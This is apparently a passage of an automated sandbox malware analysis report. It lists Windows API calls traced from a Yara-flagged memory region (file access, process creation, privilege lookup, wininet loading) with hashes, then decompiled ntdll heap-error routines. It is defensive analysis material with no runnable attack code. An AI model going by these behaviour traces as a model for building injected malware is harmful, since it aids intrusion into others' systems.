                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00164BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00164BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0016A3AD
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00164BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00164BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0016A3AD
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(00164D72,5EB65239,FFFFFFFF,00164A31,?,?,00164D72,?,00164A31,FFFFFFFF,5EB65239,00164D72,?,00000000), ref: 0016A455
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(00164D72,5EB65239,FFFFFFFF,00164A31,?,?,00164D72,?,00164A31,FFFFFFFF,5EB65239,00164D72,?,00000000), ref: 0016A455
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(00164D50,?,?,00164D50,00000000,FFFFFFFF), ref: 0016A4B5
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(00164D50,?,?,00164D50,00000000,FFFFFFFF), ref: 0016A4B5
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00169128
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00169128
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00153AF8), ref: 0016A69D
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0015836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0015838B
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0015AD62
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                        • Instruction ID: 1abc3baf4d7486c8c84eebb62993a47c200864df41628a1b030e4b2eff80926e
                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                        • Instruction Fuzzy Hash: 2D015EB5E4020DABDF10EAE4DC42FADB3789F14309F004695AD189B241F731EB188B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0016A734
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction ID: 2cf34cf7319552851a6aa75a45e75e82c23f2ed0e5b54d07e9117a0f519ed5a3
                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction Fuzzy Hash: 8901B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0015AD62
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                        • Instruction ID: 7488eaae40ea9446f2576b23a754ac92ee0cd817b3e9e77a3b2d6767f4541d4c
                        • Opcode Fuzzy Hash: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                        • Instruction Fuzzy Hash: 04F04F75A4010DABDB10EAD4D882FA9B378AB58309F008295ED1D9B641F671AA198B92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0015F050,?,?,00000000), ref: 001691EC
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 90f4d560c854e61cb04fff5511f6c9e31f58e75d6f69431325777fef47646c46
                        • Instruction ID: 40b2e39ab9d9adc57032ea50963d712c07638e7c31a88ac117d6a3b067557b30
                        • Opcode Fuzzy Hash: 90f4d560c854e61cb04fff5511f6c9e31f58e75d6f69431325777fef47646c46
                        • Instruction Fuzzy Hash: FAF02E762442413FD7315A685C47FEBBB689F52B20F140159F549DB1C3D795E4124390
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0015F050,?,?,00000000), ref: 001691EC
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                        • Instruction ID: 6907444322908499f2ef04c055193582a2c1de5ef30c9363ed8055951489a562
                        • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                        • Instruction Fuzzy Hash: BDE06D773802043AE3206599AC02FA7B29C9B91B20F15002AFA0DEA2C1DA96F81142A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0015F1D2,0015F1D2,?,00000000,?,?), ref: 0016A800
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 74acd7c4576bd7b0bd9d9c9a66c28c11f4d177fc94782425aa7f78d02a80c1ec
                        • Instruction ID: 9415d13d1f38f19bea907628d4afa9b4c79af4537a2a190766c8f272b20d9847
                        • Opcode Fuzzy Hash: 74acd7c4576bd7b0bd9d9c9a66c28c11f4d177fc94782425aa7f78d02a80c1ec
                        • Instruction Fuzzy Hash: E1F065B2600218ABDB14DF54CC41ED77769EF55310F258194FD096B242C631ED15CBF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0015F1D2,0015F1D2,?,00000000,?,?), ref: 0016A800
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction ID: 7da5782a74079ec7268a45cbcbd457f581ff7f6d810eb5349a50f9e347b89baa
                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction Fuzzy Hash: B3E01AB12002186BDB10DF59CC85EEB37ADEF88650F118154BA0867241CA30E8108BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,00158D14,?), ref: 0015F6FB
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                        • Instruction ID: 32f236d4ffc72d29b5bafc5b54320ee80c4b7516d24914b668b40f2394ff67e5
                        • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                        • Instruction Fuzzy Hash: 4ED0A7717503083BE710FAA49C03F2632CC6B55B04F490074F958DB3C7EE55F4014165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ca9d171181a4db045759579588c6030022b8ed0d2803d2738235e88a8917ce56
                        • Instruction ID: 3f8ee1ffed9ddd32eda46062b3592ba0b9ee5e145f76bc0eba2bc868a73fb7c4
                        • Opcode Fuzzy Hash: ca9d171181a4db045759579588c6030022b8ed0d2803d2738235e88a8917ce56
                        • Instruction Fuzzy Hash: CAB09B729014C5C5DB15D77046087277904B7D0741F16C095D1030655A4778C491F6B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        • The instruction at %p referenced memory at %p., xrefs: 02C4B432
                        • *** then kb to get the faulting stack, xrefs: 02C4B51C
                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02C4B323
                        • *** enter .cxr %p for the context, xrefs: 02C4B50D
                        • an invalid address, %p, xrefs: 02C4B4CF
                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02C4B314
                        • The critical section is owned by thread %p., xrefs: 02C4B3B9
                        • *** Inpage error in %ws:%s, xrefs: 02C4B418
                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02C4B53F
                        • This failed because of error %Ix., xrefs: 02C4B446
                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 02C4B2F3
                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02C4B476
                        • write to, xrefs: 02C4B4A6
                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02C4B305
                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02C4B38F
                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02C4B47D
                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02C4B484
                        • The instruction at %p tried to %s , xrefs: 02C4B4B6
                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02C4B3D6
                        • The resource is owned shared by %d threads, xrefs: 02C4B37E
                        • <unknown>, xrefs: 02C4B27E, 02C4B2D1, 02C4B350, 02C4B399, 02C4B417, 02C4B48E
                        • The resource is owned exclusively by thread %p, xrefs: 02C4B374
                        • *** Resource timeout (%p) in %ws:%s, xrefs: 02C4B352
                        • a NULL pointer, xrefs: 02C4B4E0
                        • read from, xrefs: 02C4B4AD, 02C4B4B2
                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02C4B2DC
                        • *** An Access Violation occurred in %ws:%s, xrefs: 02C4B48F
                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 02C4B39B
                        • Go determine why that thread has not released the critical section., xrefs: 02C4B3C5
                        • *** enter .exr %p for the exception record, xrefs: 02C4B4F1
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                        • API String ID: 0-108210295
                        • Opcode ID: 597cccd19b3636f94e7e4cdacaf57dd50a58fa1670f6e2ceb3450dc99f8c7c70
                        • Instruction ID: e812ad31e5a3f36b587b4f975132cedf9ba1d53f1bcec1181d530164464172fc
                        • Opcode Fuzzy Hash: 597cccd19b3636f94e7e4cdacaf57dd50a58fa1670f6e2ceb3450dc99f8c7c70
                        • Instruction Fuzzy Hash: CD813435E40210FFEB257A16CC45E7B3B26AF96BA9F804085F4096B162DF61C941EB72
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E02C51C06() {
                        				signed int _t27;
                        				char* _t104;
                        				char* _t105;
                        				intOrPtr _t113;
                        				intOrPtr _t115;
                        				intOrPtr _t117;
                        				intOrPtr _t119;
                        				intOrPtr _t120;
                        
                        				_t105 = 0x2b748a4;
                        				_t104 = "HEAP: ";
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02B9B150();
                        				} else {
                        					E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push( *0x2c8589c);
                        				E02B9B150("Heap error detected at %p (heap handle %p)\n",  *0x2c858a0);
                        				_t27 =  *0x2c85898; // 0x0
                        				if(_t27 <= 0xf) {
                        					switch( *((intOrPtr*)(_t27 * 4 +  &M02C51E96))) {
                        						case 0:
                        							_t105 = "heap_failure_internal";
                        							goto L21;
                        						case 1:
                        							goto L21;
                        						case 2:
                        							goto L21;
                        						case 3:
                        							goto L21;
                        						case 4:
                        							goto L21;
                        						case 5:
                        							goto L21;
                        						case 6:
                        							goto L21;
                        						case 7:
                        							goto L21;
                        						case 8:
                        							goto L21;
                        						case 9:
                        							goto L21;
                        						case 0xa:
                        							goto L21;
                        						case 0xb:
                        							goto L21;
                        						case 0xc:
                        							goto L21;
                        						case 0xd:
                        							goto L21;
                        						case 0xe:
                        							goto L21;
                        						case 0xf:
                        							goto L21;
                        					}
                        				}
                        				L21:
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02B9B150();
                        				} else {
                        					E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push(_t105);
                        				E02B9B150("Error code: %d - %s\n",  *0x2c85898);
                        				_t113 =  *0x2c858a4; // 0x0
                        				if(_t113 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02B9B150("Parameter1: %p\n",  *0x2c858a4);
                        				}
                        				_t115 =  *0x2c858a8; // 0x0
                        				if(_t115 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02B9B150("Parameter2: %p\n",  *0x2c858a8);
                        				}
                        				_t117 =  *0x2c858ac; // 0x0
                        				if(_t117 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02B9B150("Parameter3: %p\n",  *0x2c858ac);
                        				}
                        				_t119 =  *0x2c858b0; // 0x0
                        				if(_t119 != 0) {
                        					L41:
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push( *0x2c858b4);
                        					E02B9B150("Last known valid blocks: before - %p, after - %p\n",  *0x2c858b0);
                        				} else {
                        					_t120 =  *0x2c858b4; // 0x0
                        					if(_t120 != 0) {
                        						goto L41;
                        					}
                        				}
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02B9B150();
                        				} else {
                        					E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				return E02B9B150("Stack trace available at %p\n", 0x2c858c0);
                        			}












                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                        • API String ID: 0-2897834094
                        • Opcode ID: e65113ab5329c278742ebe7a0c026e09d2c95f5502b1bb41e87a9bafe76f3f4c
                        • Instruction ID: b52d22999296614610a9e801cfbc45205777b3b51acf90938d7c94d86c3ae5f9
                        • Opcode Fuzzy Hash: e65113ab5329c278742ebe7a0c026e09d2c95f5502b1bb41e87a9bafe76f3f4c
                        • Instruction Fuzzy Hash: C061B6379615B4DFD611AB45E88CF2573A5EB05A2470D84BAF80E5B321D7E5E8C0CE0E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02BA3D34(signed int* __ecx) {
                        				signed int* _v8;
                        				char _v12;
                        				signed int* _v16;
                        				signed int* _v20;
                        				char _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int* _v48;
                        				signed int* _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				char _v68;
                        				signed int _t140;
                        				signed int _t161;
                        				signed int* _t236;
                        				signed int* _t242;
                        				signed int* _t243;
                        				signed int* _t244;
                        				signed int* _t245;
                        				signed int _t255;
                        				void* _t257;
                        				signed int _t260;
                        				void* _t262;
                        				signed int _t264;
                        				void* _t267;
                        				signed int _t275;
                        				signed int* _t276;
                        				short* _t277;
                        				signed int* _t278;
                        				signed int* _t279;
                        				signed int* _t280;
                        				short* _t281;
                        				signed int* _t282;
                        				short* _t283;
                        				signed int* _t284;
                        				void* _t285;
                        
                        				_v60 = _v60 | 0xffffffff;
                        				_t280 = 0;
                        				_t242 = __ecx;
                        				_v52 = __ecx;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v40 = 0;
                        				_v28 = 0;
                        				_v32 = 0;
                        				_v44 = 0;
                        				_v56 = 0;
                        				_t275 = 0;
                        				_v16 = 0;
                        				if(__ecx == 0) {
                        					_t280 = 0xc000000d;
                        					_t140 = 0;
                        					L50:
                        					 *_t242 =  *_t242 | 0x00000800;
                        					_t242[0x13] = _t140;
                        					_t242[0x16] = _v40;
                        					_t242[0x18] = _v28;
                        					_t242[0x14] = _v32;
                        					_t242[0x17] = _t275;
                        					_t242[0x15] = _v44;
                        					_t242[0x11] = _v56;
                        					_t242[0x12] = _v60;
                        					return _t280;
                        				}
